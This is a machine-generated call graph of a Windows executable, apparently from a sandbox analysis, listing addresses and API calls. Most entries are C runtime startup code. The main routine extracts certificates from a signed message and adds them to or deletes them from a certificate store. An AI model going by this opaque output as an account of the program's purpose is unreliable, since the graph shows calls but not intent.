919d0d _abort 6430->6419 6431->6423 6433 915dfa 21 API calls 6432->6433 6436 919ddd 6433->6436 6434 919de3 6450 915d69 6434->6450 6436->6434 6437 919e15 6436->6437 6440 915dfa 21 API calls 6436->6440 6437->6434 6438 915dfa 21 API calls 6437->6438 6441 919e21 CloseHandle 6438->6441 6442 919e0c 6440->6442 6441->6434 6443 919e2d GetLastError 6441->6443 6445 915dfa 21 API calls 6442->6445 6443->6434 6444 9147c3 __dosmaperr 15 API calls 6446 919e5d 6444->6446 6445->6437 6446->6428 6459 915d46 LeaveCriticalSection 6447->6459 6449 919d24 6449->6430 6451 915ddf 6450->6451 6453 915d78 6450->6453 6452 9147f9 _free 15 API calls 6451->6452 6454 915de4 6452->6454 6453->6451 6458 915da2 6453->6458 6455 9147e6 __dosmaperr 15 API calls 6454->6455 6456 915dcf 6455->6456 6456->6444 6456->6446 6457 915dc9 SetStdHandle 6457->6456 6458->6456 6458->6457 6459->6449 6460->6225 6461->6205 6631 91365d 6632 913e89 33 API calls 6631->6632 6633 913665 6632->6633 6462 917d1c 6463 91522b 46 API calls 6462->6463 6464 917d21 6463->6464 6634 913d41 6637 91341b 6634->6637 6638 91342a 6637->6638 6639 913376 15 API calls 6638->6639 6640 913444 6639->6640 6641 913376 15 API calls 6640->6641 6642 91344f 6641->6642 6465 913400 6466 913412 6465->6466 6468 913418 6465->6468 6467 913376 15 API calls 6466->6467 6467->6468 6469 911e00 6470 911e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6469->6470 6471 911e9e _ValidateLocalCookies 6470->6471 6474 912340 RtlUnwind 6470->6474 6473 911f27 _ValidateLocalCookies 6474->6473 6000 919ec3 6001 919ed9 6000->6001 6002 919ecd 6000->6002 6002->6001 6003 919ed2 CloseHandle 6002->6003 6003->6001 6643 911442 6644 911a6a GetModuleHandleW 6643->6644 6645 91144a 6644->6645 6646 911480 6645->6646 6647 91144e 6645->6647 6648 913793 _abort 23 API calls 6646->6648 6649 911459 6647->6649 6652 913775 6647->6652 6650 911488 6648->6650 6653 91355e _abort 23 API calls 6652->6653 6654 913780 6653->6654 6654->6649 6004 9198c5 6006 9198ed 6004->6006 6005 919925 6006->6005 6007 919917 6006->6007 6008 91991e 6006->6008 6013 919997 6007->6013 6017 919980 6008->6017 6014 9199a0 6013->6014 6021 91a06f 6014->6021 6016 91991c 6018 9199a0 6017->6018 6019 91a06f __startOneArgErrorHandling 16 API calls 6018->6019 6020 919923 6019->6020 6022 91a0ae __startOneArgErrorHandling 6021->6022 6025 91a130 __startOneArgErrorHandling 6022->6025 6027 91a472 6022->6027 6026 91a166 _ValidateLocalCookies 6025->6026 6030 91a786 6025->6030 6026->6016 6037 91a495 6027->6037 6031 91a793 6030->6031 6032 91a7a8 6030->6032 6033 91a7ad 6031->6033 6035 9147f9 _free 15 API calls 6031->6035 6034 9147f9 _free 15 API calls 6032->6034 6033->6026 6034->6033 6036 91a7a0 6035->6036 6036->6026 6038 91a4c0 __raise_exc 6037->6038 6039 91a6b9 RaiseException 6038->6039 6040 91a490 6039->6040 6040->6025 5749 913d86 5750 911f7d ___scrt_uninitialize_crt 7 API calls 5749->5750 5751 913d8d 5750->5751 6655 919146 IsProcessorFeaturePresent 5752 911489 5755 911853 5752->5755 5754 91148e 5754->5754 5756 911869 5755->5756 5758 911872 5756->5758 5759 911806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5756->5759 5758->5754 5759->5758 6656 911248 6657 911250 6656->6657 6673 9137f7 6657->6673 6659 91125b 6680 911664 6659->6680 6661 91191f 4 API calls 6663 9112f2 6661->6663 6662 911270 __RTC_Initialize 6671 9112cd 6662->6671 6686 9117f1 6662->6686 6665 911289 6665->6671 6689 9118ab InitializeSListHead 6665->6689 6667 91129f 6690 9118ba 6667->6690 6669 9112c2 6696 913891 6669->6696 6671->6661 6672 9112ea 6671->6672 6674 913806 6673->6674 6675 913829 6673->6675 6674->6675 6676 9147f9 _free 15 API calls 6674->6676 6675->6659 6677 913819 6676->6677 6678 91473d _abort 21 API calls 6677->6678 6679 913824 6678->6679 6679->6659 6681 911670 6680->6681 6682 911674 6680->6682 6681->6662 6683 91191f 4 API calls 6682->6683 6685 911681 ___scrt_release_startup_lock 6682->6685 6684 9116ea 6683->6684 6685->6662 6703 9117c4 6686->6703 6689->6667 6741 913e2a 6690->6741 6692 9118cb 6693 9118d2 6692->6693 6694 91191f 4 API calls 6692->6694 6693->6669 6695 9118da 6694->6695 6695->6669 6697 914424 _abort 33 API calls 6696->6697 6698 91389c 6697->6698 6699 9138d4 6698->6699 6700 9147f9 _free 15 API calls 6698->6700 6699->6671 6701 9138c9 6700->6701 6702 91473d _abort 21 API calls 6701->6702 6702->6699 6704 9117d3 6703->6704 6705 9117da 6703->6705 6709 913c81 6704->6709 6712 913cf1 6705->6712 6708 9117d8 6708->6665 6710 913cf1 24 API calls 6709->6710 6711 913c93 6710->6711 6711->6708 6715 9139f8 6712->6715 6718 91392e 6715->6718 6717 913a1c 6717->6708 6719 91393a ___scrt_is_nonwritable_in_current_image 6718->6719 6726 9156e2 EnterCriticalSection 6719->6726 6721 913948 6727 913b40 6721->6727 6723 913955 6737 913973 6723->6737 6725 913966 _abort 6725->6717 6726->6721 6728 913b5e 6727->6728 6735 913b56 _abort 6727->6735 6729 913bb7 6728->6729 6730 91681b 24 API calls 6728->6730 6728->6735 6731 91681b 24 API calls 6729->6731 6729->6735 6732 913bad 6730->6732 6733 913bcd 6731->6733 6734 914869 _free 15 API calls 6732->6734 6736 914869 _free 15 API calls 6733->6736 6734->6729 6735->6723 6736->6735 6740 91572a LeaveCriticalSection 6737->6740 6739 91397d 6739->6725 6740->6739 6742 913e48 6741->6742 6746 913e68 6741->6746 6743 9147f9 _free 15 API calls 6742->6743 6744 913e5e 6743->6744 6745 91473d _abort 21 API calls 6744->6745 6745->6746 6746->6692 5760 914c8a 5765 914cbf 5760->5765 5763 914ca6 5764 914869 _free 15 API calls 5764->5763 5766 914cd1 5765->5766 5767 914c98 5765->5767 5768 914d01 5766->5768 5769 914cd6 5766->5769 5767->5763 5767->5764 5768->5767 5776 91681b 5768->5776 5770 91480c _abort 15 API calls 5769->5770 5771 914cdf 5770->5771 5773 914869 _free 15 API calls 5771->5773 5773->5767 5774 914d1c 5775 914869 _free 15 API calls 5774->5775 5775->5767 5777 916826 5776->5777 5778 91684e 5777->5778 5779 91683f 5777->5779 5780 91685d 5778->5780 5785 917e13 5778->5785 5781 9147f9 _free 15 API calls 5779->5781 5792 917e46 5780->5792 5784 916844 _abort 5781->5784 5784->5774 5786 917e33 HeapSize 5785->5786 5787 917e1e 5785->5787 5786->5780 5788 9147f9 _free 15 API calls 5787->5788 5789 917e23 5788->5789 5790 91473d _abort 21 API calls 5789->5790 5791 917e2e 5790->5791 5791->5780 5793 917e53 5792->5793 5794 917e5e 5792->5794 5795 9162ff 16 API calls 5793->5795 5796 917e66 5794->5796 5802 917e6f _abort 5794->5802 5800 917e5b 5795->5800 5797 914869 _free 15 API calls 5796->5797 5797->5800 5798 917e74 5801 9147f9 _free 15 API calls 5798->5801 5799 917e99 HeapReAlloc 5799->5800 5799->5802 5800->5784 5801->5800 5802->5798 5802->5799 5803 916992 _abort 2 API calls 5802->5803 5803->5802 5032 91130d 5033 911319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 91162b 5033->5060 5035 911320 5036 911473 5035->5036 5047 91134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5047 5112 91191f IsProcessorFeaturePresent 5036->5112 5038 91147a 5039 911480 5038->5039 5116 9137e1 5038->5116 5119 913793 5039->5119 5043 911369 5044 9113ea 5068 911a34 5044->5068 5047->5043 5047->5044 5097 9137a9 5047->5097 5052 911405 5103 911a6a GetModuleHandleW 5052->5103 5055 911410 5056 911419 5055->5056 5105 913784 5055->5105 5108 91179c 5056->5108 5061 911634 5060->5061 5122 911bd4 IsProcessorFeaturePresent 5061->5122 5065 911645 5066 911649 5065->5066 5132 911f7d 5065->5132 5066->5035 5192 9120b0 5068->5192 5071 9113f0 5072 913457 5071->5072 5194 91522b 5072->5194 5074 913460 5076 9113f8 5074->5076 5198 9155b6 5074->5198 5077 911000 6 API calls 5076->5077 5078 9111e3 Sleep 5077->5078 5079 911096 CryptMsgGetParam 5077->5079 5080 911215 CertCloseStore LocalFree LocalFree LocalFree 5078->5080 5081 9111f7 5078->5081 5082 911162 CryptMsgGetParam 5079->5082 5083 9110bc LocalAlloc 5079->5083 5080->5052 5081->5080 5088 91120a CertDeleteCertificateFromStore 5081->5088 5082->5078 5084 911174 CryptMsgGetParam 5082->5084 5085 9110d7 5083->5085 5086 911156 LocalFree 5083->5086 5084->5078 5087 911188 CertFindAttribute CertFindAttribute 5084->5087 5089 9110e0 LocalAlloc CryptMsgGetParam 5085->5089 5086->5082 5090 9111b1 5087->5090 5091 9111b5 LoadLibraryA GetProcAddress 5087->5091 5088->5081 5092 911114 CertCreateCertificateContext 5089->5092 5093 91113d LocalFree 5089->5093 5090->5078 5090->5091 5091->5078 5094 911133 CertFreeCertificateContext 5092->5094 5095 911126 CertAddCertificateContextToStore 5092->5095 5093->5089 5096 91114d 5093->5096 5094->5093 5095->5094 5096->5086 5098 9137d1 _abort 5097->5098 5098->5044 5099 914424 _abort 33 API calls 5098->5099 5102 913e9a 5099->5102 5100 913f24 _abort 33 API calls 5101 913ec4 5100->5101 5102->5100 5104 91140c 5103->5104 5104->5038 5104->5055 5686 91355e 5105->5686 5107 91378f 5107->5056 5110 9117a8 ___scrt_uninitialize_crt 5108->5110 5109 911421 5109->5043 5110->5109 5111 911f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 911935 _abort 5112->5113 5114 9119e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 911a24 _abort 5114->5115 5115->5038 5117 91355e _abort 23 API calls 5116->5117 5118 9137f2 5117->5118 5118->5039 5120 91355e _abort 23 API calls 5119->5120 5121 911488 5120->5121 5123 911640 5122->5123 5124 911f5e 5123->5124 5138 9124b1 5124->5138 5128 911f6f 5129 911f7a 5128->5129 5152 9124ed 5128->5152 5129->5065 5131 911f67 5131->5065 5133 911f90 5132->5133 5134 911f86 5132->5134 5133->5066 5135 912496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 911f8b 5135->5136 5137 9124ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5133 5139 9124ba 5138->5139 5141 9124e3 5139->5141 5142 911f63 5139->5142 5156 91271d 5139->5156 5143 9124ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5131 5144 912463 5142->5144 5143->5142 5173 91262e 5144->5173 5149 912493 5149->5128 5151 912478 5151->5128 5153 912517 5152->5153 5154 9124f8 5152->5154 5153->5131 5155 912502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 912543 5156->5161 5159 912755 InitializeCriticalSectionAndSpinCount 5160 912740 5159->5160 5160->5139 5162 912560 5161->5162 5165 912564 5161->5165 5162->5159 5162->5160 5163 9125cc GetProcAddress 5163->5162 5165->5162 5165->5163 5166 9125bd 5165->5166 5168 9125e3 LoadLibraryExW 5165->5168 5166->5163 5167 9125c5 FreeLibrary 5166->5167 5167->5163 5169 9125fa GetLastError 5168->5169 5170 91262a 5168->5170 5169->5170 5171 912605 ___vcrt_InitializeCriticalSectionEx 5169->5171 5170->5165 5171->5170 5172 91261b LoadLibraryExW 5171->5172 5172->5165 5174 912543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5173->5174 5175 912648 5174->5175 5176 912661 TlsAlloc 5175->5176 5177 91246d 5175->5177 5177->5151 5178 9126df 5177->5178 5179 912543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5178->5179 5180 9126f9 5179->5180 5181 912714 TlsSetValue 5180->5181 5182 912486 5180->5182 5181->5182 5182->5149 5183 912496 5182->5183 5184 9124a0 5183->5184 5185 9124a6 5183->5185 5187 912669 5184->5187 5185->5151 5188 912543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5187->5188 5189 912683 5188->5189 5190 91269b TlsFree 5189->5190 5191 91268f 5189->5191 5190->5191 5191->5185 5193 911a47 GetStartupInfoW 5192->5193 5193->5071 5195 915234 5194->5195 5196 91523d 5194->5196 5201 91512a 5195->5201 5196->5074 5683 91555d 5198->5683 5221 914424 GetLastError 5201->5221 5203 915137 5241 915249 5203->5241 5205 91513f 5250 914ebe 5205->5250 5208 915156 5208->5196 5213 91518c 5214 915194 5213->5214 5215 9151b1 5213->5215 5272 9147f9 5214->5272 5217 9151dd 5215->5217 5218 914869 _free 15 API calls 5215->5218 5220 915199 5217->5220 5281 914d94 5217->5281 5218->5217 5275 914869 5220->5275 5222 914440 5221->5222 5223 91443a 5221->5223 5227 91448f SetLastError 5222->5227 5289 91480c 5222->5289 5284 915904 5223->5284 5227->5203 5228 91445a 5230 914869 _free 15 API calls 5228->5230 5232 914460 5230->5232 5231 91446f 5231->5228 5233 914476 5231->5233 5234 91449b SetLastError 5232->5234 5301 914296 5233->5301 5306 913f24 5234->5306 5238 914869 _free 15 API calls 5240 914488 5238->5240 5240->5227 5240->5234 5242 915255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 914424 _abort 33 API calls 5242->5243 5248 91525f 5243->5248 5245 9152e3 _abort 5245->5205 5247 913f24 _abort 33 API calls 5247->5248 5248->5245 5248->5247 5249 914869 _free 15 API calls 5248->5249 5542 9156e2 EnterCriticalSection 5248->5542 5543 9152da 5248->5543 5249->5248 5547 913f72 5250->5547 5253 914ef1 5255 914f08 5253->5255 5256 914ef6 GetACP 5253->5256 5254 914edf GetOEMCP 5254->5255 5255->5208 5257 9162ff 5255->5257 5256->5255 5258 91633d 5257->5258 5263 91630d _abort 5257->5263 5260 9147f9 _free 15 API calls 5258->5260 5259 916328 HeapAlloc 5261 915167 5259->5261 5259->5263 5260->5261 5261->5220 5264 9152eb 5261->5264 5262 916992 _abort 2 API calls 5262->5263 5263->5258 5263->5259 5263->5262 5265 914ebe 35 API calls 5264->5265 5266 91530a 5265->5266 5267 91535b IsValidCodePage 5266->5267 5269 915311 _ValidateLocalCookies 5266->5269 5271 915380 _abort 5266->5271 5268 91536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5213 5584 914f96 GetCPInfo 5271->5584 5273 9144a8 _abort 15 API calls 5272->5273 5274 9147fe 5273->5274 5274->5220 5276 91489d _free 5275->5276 5277 914874 HeapFree 5275->5277 5276->5208 5277->5276 5278 914889 5277->5278 5279 9147f9 _free 13 API calls 5278->5279 5280 91488f GetLastError 5279->5280 5280->5276 5647 914d51 5281->5647 5283 914db8 5283->5220 5317 915741 5284->5317 5286 91592b 5287 915943 TlsGetValue 5286->5287 5288 915937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5222 5294 914819 _abort 5289->5294 5290 914859 5293 9147f9 _free 14 API calls 5290->5293 5291 914844 HeapAlloc 5292 914452 5291->5292 5291->5294 5292->5228 5296 91595a 5292->5296 5293->5292 5294->5290 5294->5291 5330 916992 5294->5330 5297 915741 _abort 5 API calls 5296->5297 5298 915981 5297->5298 5299 915990 _ValidateLocalCookies 5298->5299 5300 91599c TlsSetValue 5298->5300 5299->5231 5300->5299 5344 91426e 5301->5344 5452 916b14 5306->5452 5309 913f35 5310 913f5c 5309->5310 5311 913f3e IsProcessorFeaturePresent 5309->5311 5314 913793 _abort 23 API calls 5310->5314 5313 913f49 5311->5313 5480 914573 5313->5480 5316 913f66 5314->5316 5319 91576d 5317->5319 5322 915771 _abort 5317->5322 5321 915791 5319->5321 5319->5322 5323 9157dd 5319->5323 5320 91579d GetProcAddress 5320->5322 5321->5320 5321->5322 5322->5286 5324 9157fe LoadLibraryExW 5323->5324 5325 9157f3 5323->5325 5326 915833 5324->5326 5327 91581b GetLastError 5324->5327 5325->5319 5326->5325 5328 91584a FreeLibrary 5326->5328 5327->5326 5329 915826 LoadLibraryExW 5327->5329 5328->5325 5329->5326 5333 9169d6 5330->5333 5332 9169a8 _ValidateLocalCookies 5332->5294 5334 9169e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 9156e2 EnterCriticalSection 5334->5339 5336 9169ed 5340 916a1f 5336->5340 5338 916a14 _abort 5338->5332 5339->5336 5343 91572a LeaveCriticalSection 5340->5343 5342 916a26 5342->5338 5343->5342 5350 9141ae 5344->5350 5346 914292 5347 91421e 5346->5347 5361 9140b2 5347->5361 5349 914242 5349->5238 5351 9141ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 9156e2 EnterCriticalSection 5351->5356 5353 9141c4 5357 9141ea 5353->5357 5355 9141e2 _abort 5355->5346 5356->5353 5360 91572a LeaveCriticalSection 5357->5360 5359 9141f4 5359->5355 5360->5359 5362 9140be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 9156e2 EnterCriticalSection 5362->5369 5364 9140c8 5370 9143d9 5364->5370 5366 9140e0 5374 9140f6 5366->5374 5368 9140ee _abort 5368->5349 5369->5364 5371 91440f __fassign 5370->5371 5372 9143e8 __fassign 5370->5372 5371->5366 5372->5371 5377 916507 5372->5377 5451 91572a LeaveCriticalSection 5374->5451 5376 914100 5376->5368 5378 916587 5377->5378 5381 91651d 5377->5381 5380 914869 _free 15 API calls 5378->5380 5403 9165d5 5378->5403 5382 9165a9 5380->5382 5381->5378 5384 914869 _free 15 API calls 5381->5384 5399 916550 5381->5399 5383 914869 _free 15 API calls 5382->5383 5385 9165bc 5383->5385 5387 916545 5384->5387 5388 914869 _free 15 API calls 5385->5388 5386 914869 _free 15 API calls 5390 91657c 5386->5390 5405 916078 5387->5405 5394 9165ca 5388->5394 5389 914869 _free 15 API calls 5395 916567 5389->5395 5397 914869 _free 15 API calls 5390->5397 5391 916643 5392 914869 _free 15 API calls 5391->5392 5398 916649 5392->5398 5400 914869 _free 15 API calls 5394->5400 5433 916176 5395->5433 5396 9165e3 5396->5391 5402 914869 15 API calls _free 5396->5402 5397->5378 5398->5371 5399->5389 5404 916572 5399->5404 5400->5403 5402->5396 5445 91667a 5403->5445 5404->5386 5406 916172 5405->5406 5407 916089 5405->5407 5406->5399 5408 91609a 5407->5408 5409 914869 _free 15 API calls 5407->5409 5410 9160ac 5408->5410 5412 914869 _free 15 API calls 5408->5412 5409->5408 5411 9160be 5410->5411 5413 914869 _free 15 API calls 5410->5413 5414 9160d0 5411->5414 5415 914869 _free 15 API calls 5411->5415 5412->5410 5413->5411 5416 9160e2 5414->5416 5417 914869 _free 15 API calls 5414->5417 5415->5414 5418 9160f4 5416->5418 5420 914869 _free 15 API calls 5416->5420 5417->5416 5419 916106 5418->5419 5421 914869 _free 15 API calls 5418->5421 5422 916118 5419->5422 5423 914869 _free 15 API calls 5419->5423 5420->5418 5421->5419 5424 91612a 5422->5424 5425 914869 _free 15 API calls 5422->5425 5423->5422 5426 91613c 5424->5426 5428 914869 _free 15 API calls 5424->5428 5425->5424 5427 91614e 5426->5427 5429 914869 _free 15 API calls 5426->5429 5430 916160 5427->5430 5431 914869 _free 15 API calls 5427->5431 5428->5426 5429->5427 5430->5406 5432 914869 _free 15 API calls 5430->5432 5431->5430 5432->5406 5434 916183 5433->5434 5444 9161db 5433->5444 5435 914869 _free 15 API calls 5434->5435 5438 916193 5434->5438 5435->5438 5436 9161a5 5437 9161b7 5436->5437 5440 914869 _free 15 API calls 5436->5440 5441 9161c9 5437->5441 5442 914869 _free 15 API calls 5437->5442 5438->5436 5439 914869 _free 15 API calls 5438->5439 5439->5436 5440->5437 5443 914869 _free 15 API calls 5441->5443 5441->5444 5442->5441 5443->5444 5444->5404 5446 916687 5445->5446 5450 9166a5 5445->5450 5447 91621b __fassign 15 API calls 5446->5447 5446->5450 5448 91669f 5447->5448 5449 914869 _free 15 API calls 5448->5449 5449->5450 5450->5396 5451->5376 5484 916a82 5452->5484 5455 916b6f 5456 916b7b _abort 5455->5456 5460 916ba8 _abort 5456->5460 5463 916ba2 _abort 5456->5463 5498 9144a8 GetLastError 5456->5498 5458 916bf4 5459 9147f9 _free 15 API calls 5458->5459 5461 916bf9 5459->5461 5462 916c20 5460->5462 5520 9156e2 EnterCriticalSection 5460->5520 5517 91473d 5461->5517 5467 916c7f 5462->5467 5469 916c77 5462->5469 5477 916caa 5462->5477 5521 91572a LeaveCriticalSection 5462->5521 5463->5458 5463->5460 5466 916bd7 _abort 5463->5466 5466->5309 5467->5477 5522 916b66 5467->5522 5472 913793 _abort 23 API calls 5469->5472 5472->5467 5474 914424 _abort 33 API calls 5478 916d0d 5474->5478 5476 916b66 _abort 33 API calls 5476->5477 5525 916d2f 5477->5525 5478->5466 5479 914424 _abort 33 API calls 5478->5479 5479->5466 5481 91458f _abort 5480->5481 5482 9145bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 91468c _abort _ValidateLocalCookies 5482->5483 5483->5310 5487 916a28 5484->5487 5486 913f29 5486->5309 5486->5455 5488 916a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 9156e2 EnterCriticalSection 5488->5493 5490 916a42 5494 916a76 5490->5494 5492 916a69 _abort 5492->5486 5493->5490 5497 91572a LeaveCriticalSection 5494->5497 5496 916a80 5496->5492 5497->5496 5499 9144c1 5498->5499 5500 9144c7 5498->5500 5502 915904 _abort 6 API calls 5499->5502 5501 91480c _abort 12 API calls 5500->5501 5505 91451e SetLastError 5500->5505 5503 9144d9 5501->5503 5502->5500 5504 9144e1 5503->5504 5507 91595a _abort 6 API calls 5503->5507 5508 914869 _free 12 API calls 5504->5508 5506 914527 5505->5506 5506->5463 5509 9144f6 5507->5509 5510 9144e7 5508->5510 5509->5504 5511 9144fd 5509->5511 5512 914515 SetLastError 5510->5512 5513 914296 _abort 12 API calls 5511->5513 5512->5506 5514 914508 5513->5514 5515 914869 _free 12 API calls 5514->5515 5516 91450e 5515->5516 5516->5505 5516->5512 5529 9146c2 5517->5529 5519 914749 5519->5466 5520->5462 5521->5469 5523 914424 _abort 33 API calls 5522->5523 5524 916b6b 5523->5524 5524->5476 5526 916d35 5525->5526 5527 916cfe 5525->5527 5541 91572a LeaveCriticalSection 5526->5541 5527->5466 5527->5474 5527->5478 5530 9144a8 _abort 15 API calls 5529->5530 5531 9146d8 5530->5531 5536 9146e6 _ValidateLocalCookies 5531->5536 5537 91474d IsProcessorFeaturePresent 5531->5537 5533 91473c 5534 9146c2 _abort 21 API calls 5533->5534 5535 914749 5534->5535 5535->5519 5536->5519 5538 914758 5537->5538 5539 914573 _abort 3 API calls 5538->5539 5540 91476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5527 5542->5248 5546 91572a LeaveCriticalSection 5543->5546 5545 9152e1 5545->5248 5546->5545 5548 913f8f 5547->5548 5549 913f85 5547->5549 5548->5549 5550 914424 _abort 33 API calls 5548->5550 5549->5253 5549->5254 5551 913fb0 5550->5551 5555 9172d1 5551->5555 5556 9172e4 5555->5556 5557 913fc9 5555->5557 5556->5557 5563 916754 5556->5563 5559 9172fe 5557->5559 5560 917311 5559->5560 5561 917326 5559->5561 5560->5561 5562 915249 __fassign 33 API calls 5560->5562 5561->5549 5562->5561 5564 916760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 914424 _abort 33 API calls 5564->5565 5566 916769 5565->5566 5570 9167b7 _abort 5566->5570 5575 9156e2 EnterCriticalSection 5566->5575 5568 916787 5576 9167cb 5568->5576 5570->5557 5574 913f24 _abort 33 API calls 5574->5570 5575->5568 5577 9167d9 __fassign 5576->5577 5579 91679b 5576->5579 5578 916507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 9167ba 5579->5580 5583 91572a LeaveCriticalSection 5580->5583 5582 9167ae 5582->5570 5582->5574 5583->5582 5585 914fd0 5584->5585 5591 91507a _ValidateLocalCookies 5584->5591 5592 91634d 5585->5592 5587 915031 5604 917cd1 5587->5604 5590 917cd1 38 API calls 5590->5591 5591->5269 5593 913f72 __fassign 33 API calls 5592->5593 5594 91636d MultiByteToWideChar 5593->5594 5596 9163ab 5594->5596 5602 916443 _ValidateLocalCookies 5594->5602 5597 9163cc _abort __alloca_probe_16 5596->5597 5599 9162ff 16 API calls 5596->5599 5598 91643d 5597->5598 5601 916411 MultiByteToWideChar 5597->5601 5609 91646a 5598->5609 5599->5597 5601->5598 5603 91642d GetStringTypeW 5601->5603 5602->5587 5603->5598 5605 913f72 __fassign 33 API calls 5604->5605 5606 917ce4 5605->5606 5613 917ab4 5606->5613 5608 915052 5608->5590 5610 916476 5609->5610 5611 916487 5609->5611 5610->5611 5612 914869 _free 15 API calls 5610->5612 5611->5602 5612->5611 5614 917acf 5613->5614 5615 917af5 MultiByteToWideChar 5614->5615 5616 917ca9 _ValidateLocalCookies 5615->5616 5617 917b1f 5615->5617 5616->5608 5618 9162ff 16 API calls 5617->5618 5621 917b40 __alloca_probe_16 5617->5621 5618->5621 5619 917bf5 5624 91646a __freea 15 API calls 5619->5624 5620 917b89 MultiByteToWideChar 5620->5619 5622 917ba2 5620->5622 5621->5619 5621->5620 5638 915a15 5622->5638 5624->5616 5625 917bb9 5625->5619 5626 917c04 5625->5626 5627 917bcc 5625->5627 5628 9162ff 16 API calls 5626->5628 5632 917c25 __alloca_probe_16 5626->5632 5627->5619 5630 915a15 6 API calls 5627->5630 5628->5632 5629 917c9a 5631 91646a __freea 15 API calls 5629->5631 5630->5619 5631->5619 5632->5629 5633 915a15 6 API calls 5632->5633 5634 917c79 5633->5634 5634->5629 5635 917c88 WideCharToMultiByte 5634->5635 5635->5629 5636 917cc8 5635->5636 5637 91646a __freea 15 API calls 5636->5637 5637->5619 5639 915741 _abort 5 API calls 5638->5639 5640 915a3c 5639->5640 5643 915a45 _ValidateLocalCookies 5640->5643 5644 915a9d 5640->5644 5642 915a85 LCMapStringW 5642->5643 5643->5625 5645 915741 _abort 5 API calls 5644->5645 5646 915ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 914d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 9156e2 EnterCriticalSection 5648->5655 5650 914d67 5656 914dbc 5650->5656 5654 914d80 _abort 5654->5283 5655->5650 5668 9154dc 5656->5668 5658 914e0a 5659 9154dc 21 API calls 5658->5659 5660 914e26 5659->5660 5661 9154dc 21 API calls 5660->5661 5662 914e44 5661->5662 5663 914d74 5662->5663 5664 914869 _free 15 API calls 5662->5664 5665 914d88 5663->5665 5664->5663 5682 91572a LeaveCriticalSection 5665->5682 5667 914d92 5667->5654 5669 9154ed 5668->5669 5678 9154e9 5668->5678 5670 9154f4 5669->5670 5671 915507 _abort 5669->5671 5672 9147f9 _free 15 API calls 5670->5672 5675 915535 5671->5675 5676 91553e 5671->5676 5671->5678 5673 9154f9 5672->5673 5674 91473d _abort 21 API calls 5673->5674 5674->5678 5677 9147f9 _free 15 API calls 5675->5677 5676->5678 5680 9147f9 _free 15 API calls 5676->5680 5679 91553a 5677->5679 5678->5658 5681 91473d _abort 21 API calls 5679->5681 5680->5679 5681->5678 5682->5667 5684 913f72 __fassign 33 API calls 5683->5684 5685 915571 5684->5685 5685->5074 5687 91356a _abort 5686->5687 5688 913582 5687->5688 5701 9136b8 GetModuleHandleW 5687->5701 5708 9156e2 EnterCriticalSection 5688->5708 5695 91358a 5697 9135ff _abort 5695->5697 5709 913c97 5695->5709 5696 913671 _abort 5696->5107 5712 913668 5697->5712 5702 913576 5701->5702 5702->5688 5703 9136fc GetModuleHandleExW 5702->5703 5704 913726 GetProcAddress 5703->5704 5705 91373b 5703->5705 5704->5705 5706 913758 _ValidateLocalCookies 5705->5706 5707 91374f FreeLibrary 5705->5707 5706->5688 5707->5706 5708->5695 5723 9139d0 5709->5723 5743 91572a LeaveCriticalSection 5712->5743 5714 913641 5714->5696 5715 913677 5714->5715 5744 915b1f 5715->5744 5717 913681 5718 9136a5 5717->5718 5719 913685 GetPEB 5717->5719 5721 9136fc _abort 3 API calls 5718->5721 5719->5718 5720 913695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 9136ad ExitProcess 5721->5722 5726 91397f 5723->5726 5725 9139f4 5725->5697 5727 91398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 9156e2 EnterCriticalSection 5727->5734 5729 913999 5735 913a20 5729->5735 5731 9139a6 5739 9139c4 5731->5739 5733 9139b7 _abort 5733->5725 5734->5729 5736 913a48 5735->5736 5738 913a40 _ValidateLocalCookies 5735->5738 5737 914869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 91572a LeaveCriticalSection 5739->5742 5741 9139ce 5741->5733 5742->5741 5743->5714 5745 915b44 5744->5745 5747 915b3a _ValidateLocalCookies 5744->5747 5746 915741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6747 91324d 6748 91522b 46 API calls 6747->6748 6749 91325f 6748->6749 6758 91561e GetEnvironmentStringsW 6749->6758 6752 91326a 6754 914869 _free 15 API calls 6752->6754 6755 91329f 6754->6755 6756 913275 6757 914869 _free 15 API calls 6756->6757 6757->6752 6759 915635 6758->6759 6769 915688 6758->6769 6760 91563b WideCharToMultiByte 6759->6760 6763 915657 6760->6763 6760->6769 6761 915691 FreeEnvironmentStringsW 6762 913264 6761->6762 6762->6752 6770 9132a5 6762->6770 6764 9162ff 16 API calls 6763->6764 6765 91565d 6764->6765 6766 91567a 6765->6766 6767 915664 WideCharToMultiByte 6765->6767 6768 914869 _free 15 API calls 6766->6768 6767->6766 6768->6769 6769->6761 6769->6762 6771 9132ba 6770->6771 6772 91480c _abort 15 API calls 6771->6772 6781 9132e1 6772->6781 6773 914869 _free 15 API calls 6774 91335f 